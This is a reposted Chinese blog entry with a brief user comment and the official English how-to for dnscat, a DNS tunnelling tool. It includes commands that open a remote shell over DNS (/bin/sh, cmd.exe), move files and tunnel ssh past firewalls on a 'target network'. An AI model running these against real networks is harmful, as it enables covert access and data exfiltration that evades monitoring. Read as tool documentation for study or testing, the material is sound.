dnscat使用——整体感觉这个工具不完善,失败率很高,传文件时候没有完整性校验,我自己测试时通过域名转发失败,可能是其特征过于明显导致
2017-12-14 17:58
756 查看
git clone https://github.com/iagox86/nbtool
make
然后就可以按照下面的官方说明进行操作了。
我的感受:整体感觉这个工具不完善,失败率很高,传文件时候没有完整性校验,我自己测试时通过域名转发失败,可能是其特征过于明显导致(子域名里有dnscat关键字)。
Adding --multi enables a dnscat server to handle multiple simultaneous clients:
While --multi is obviously more functional, it is also slightly more difficult to use and doesn't take as kindly to redirection (it takes a little bit of shell magic to make it useful; I don't recommend it). Every client that connects picks a unique session id, which is displayed before every message. To send messages to specific sessions, the outgoing messages also have to be prefixed with the session id. So, sessions look like this (the '(in)' and '(out)' are added for clarification):
And so on. When --multi isn't being used, redirection can be used to read/write files, create relays, and so on, the same way netcat can.
First, and the usage I recommend: if the server is an authority for a domain name, you can use the --domain argument to provide the domain. Requests will be sent to the local dns server and will eventually be routed, through the DNS hierarchy, to the server. This is the best way to use dnscat, because it is very unlikely to be prevented. For more information, see the outline of Recursive Dns, above.
The second method is to send the dns messages directly from the client to the server using the --dns argument to specify the dnscat server address. This is useful for testing, and can fool simple packet captures and poorly conceived firewall rules, but isn't an ideal usage of dnscat.
By default, a random session id will be generated. If you run the dnscat server in --multi mode, you will likely want to use the --session argument on the client to give the sessions a more friendly name. No two sessions can share an id, though, and all names must be dns-friendly characters (letters and numbers).
To summarize, here are the two options for starting a client.
Where 'skullseclabs.org' is the domain that the dnscat server is the authority for, or '1.2.3.4' is the ip address of the dnscat server.
Or, if multiple clients will connect, --multi can be given:
For example:
And to start it without an authoritative domain, use this:
For example:
For more options, use --help:
And run the shell on the client side:
Linux/BSD:
Windows:
On the server, you can now type commands and they'll run on the client side.
You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:
A couple things to note:
No integrity checking is performed
There is currently no indication when a transfer is finished
Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.
A diagram might help:
It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. :)
First, we start the netcat server. The server is going to run netcat, which listens on port 1234:
If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.
Second, on the client side, dnscat connects to 192.168.2.100 port 22:
This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.
Third and finally, we ssh to our socket:
Alternatively, if available you can also use the ssh -o ProxyCommand option which avoids the need for nc on the client:
One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!
make
然后就可以按照下面的官方说明进行操作了。
我的感受:整体感觉这个工具不完善,失败率很高,传文件时候没有完整性校验,我自己测试时通过域名转发失败,可能是其特征过于明显导致(子域名里有dnscat关键字)。
How-to
If you're going to read one section, this is probably the best one. It'll answer the question, "what the heck do I do with dnscat?"Starting a server
You can start a dnscat server that supports a single client by running:dnscat --listen
Adding --multi enables a dnscat server to handle multiple simultaneous clients:
dnscat --listen --multi
While --multi is obviously more functional, it is also slightly more difficult to use and doesn't take as kindly to redirection (it takes a little bit of shell magic to make it useful; I don't recommend it). Every client that connects picks a unique session id, which is displayed before every message. To send messages to specific sessions, the outgoing messages also have to be prefixed with the session id. So, sessions look like this (the '(in)' and '(out)' are added for clarification):
(in) session1: This is some incoming data for the first session (out) session2: This is outgoing data on second session (in) session2: This is a response on the second connection
And so on. When --multi isn't being used, redirection can be used to read/write files, create relays, and so on, the same way netcat can.
Starting a client
Once a server is running, a client can connect to it. This can be done in one of two ways.First, and the usage I recommend: if the server is an authority for a domain name, you can use the --domain argument to provide the domain. Requests will be sent to the local dns server and will eventually be routed, through the DNS hierarchy, to the server. This is the best way to use dnscat, because it is very unlikely to be prevented. For more information, see the outline of Recursive Dns, above.
The second method is to send the dns messages directly from the client to the server using the --dns argument to specify the dnscat server address. This is useful for testing, and can fool simple packet captures and poorly conceived firewall rules, but isn't an ideal usage of dnscat.
By default, a random session id will be generated. If you run the dnscat server in --multi mode, you will likely want to use the --session argument on the client to give the sessions a more friendly name. No two sessions can share an id, though, and all names must be dns-friendly characters (letters and numbers).
To summarize, here are the two options for starting a client.
dnscat --domain skullseclabs.org or dnscat --dns 1.2.3.4
Where 'skullseclabs.org' is the domain that the dnscat server is the authority for, or '1.2.3.4' is the ip address of the dnscat server.
Examples
Simple server
As discussed above, a dnscat server can be started using the --listen argument:dnscat --listen
Or, if multiple clients will connect, --multi can be given:
dnscat --listen --multi
Simple client
To start a dnscat client with an authoritative domain, use the following command:dnscat --domain <domain>
For example:
dnscat --domain skullseclabs.org
And to start it without an authoritative domain, use this:
dnscat --dns <dnscat_server_address>
For example:
dnscat --domain 1.2.4.4
For more options, use --help:
dnscat --help
Remote shell
Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:dnscat --listen
And run the shell on the client side:
Linux/BSD:
dnscat --domain skullseclabs.org --exec "/bin/sh"
Windows:
dnscat.exe --domain skullseclabs.org --exec "cmd.exe"
On the server, you can now type commands and they'll run on the client side.
Transfer a file
You can transfer a file to the client from the server like this:Server: dnscat --listen > file.out Client: dnscat --domain <domain> < file.in
You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:
Server: dnscat --listen < file.in Client: dnscat --domain <domain> > file.out
A couple things to note:
No integrity checking is performed
There is currently no indication when a transfer is finished
Tunnel another connection
This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.
A diagram might help:
ssh client | | (port 1234 via netcat) | v dnscat server ^ | | (DNS server(s)) | dnscat client | | (port 22 via netcat) | v ssh server
It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. :)
First, we start the netcat server. The server is going to run netcat, which listens on port 1234:
dnscat --listen --exec "nc -l -p 1234"
If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.
Second, on the client side, dnscat connects to 192.168.2.100 port 22:
dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"
This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.
Third and finally, we ssh to our socket:
ssh -p 1234 ron@127.0.0.1
Alternatively, if available you can also use the ssh -o ProxyCommand option which avoids the need for nc on the client:
ssh -o ProxyCommand="./dnscat --domain skullseclabs.org" root@localhost
One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!
相关文章推荐
- 当加载一个动态库时,可能因为这个动态库依赖于其他的动态库,而加载他的时候找到这个动态库之后默认到系统盘去找其依赖的动态库而导致没有找到其 依赖的动态库。
- 在离线安装谷歌插件(即.crx文件)的时候,不要直接从压缩包中的.crx文件直接拖入浏览器,而是要解压后再拖入,不然会报错。而这个错误很容易让人感觉是.crx文件有问题导致的,其实不是。
- [BAT][JAVA]定时任务之-Quartz使用篇(通过这个配置可以知道在做Quartz的时候需要的jar文件/Cron表达式使用语法/常用Cron表达式)
- SQL Server 2005 如何在没有日志文件的情况下如何恢复MDF数据库文件(测试通过)
- 在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。如果在 IIS 中没有将虚拟目录配置为应用程序,则可能导致此错误
- windows 2003 Windows无法访问指定设备路径或文件,您可能没有合适的权限访问这个项目
- 网络中无法访问XP系统下共享文件,错误:计算机无法访问,您可能没有权限使用网络资源
- 在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。如果在 IIS 中没有将虚拟目录配置为应用程序,则可能导致此错误。
- 特殊情况下产生的”在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。如果在 IIS 中没有将虚拟目录配置为应用程序,则可能导致此错误。”
- windows无法访问指定设备 路径或文件,你可能没有合适的权限访问这个项目
- Visual Assist X尽量避免在非英文目录下使用,否则可能由于文件路径不能识别而导致不能进行提示
- Linux系统中,有两个文件file1和file2,每个文件的每一行都是#UUID,其中的每一UUID表示一个号。要找出在file1中有而在file2中没有的UUID,使用cat,sort,uniq三个命令如何实现
- 安装VS2005 SP1出现这样问题“windows 无法访问指定设备、路径或文件。您可能没有合适的权限访问这个项目。”
- 【转】使用Dotfuscator混淆处理融入DotNet ClickOnce发布(超经典,测试已通过,转发的,吐血推荐,不看也收藏了)简称:混淆发布
- SQL存储过程测试(8)——当待测存储过程没有返回值的时候 如何判断测试结果是否通过
- 在应用程序级别之外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。如果在 IIS 中没有将虚拟目录配置为应用程序,则可能导致此错误。
- 分析器错误信息: 在应用程序级别以外使用注册为 allowDefinition='MachineToApplication' 的节是错误的。导致该错误的原因可能是在 IIS 中没有将虚拟目录作为应用程序进行配置。
- 共享访问失败解决(无法访问 您可能没有权限使用网络资源)
- 在SQL SERVER2005下,如何在没有日志文件的情况下如何恢复MDF数据库文件(测试通过)
- Windows无法访问指定设备路径或文件,您可能没有合适的权限访问这个项目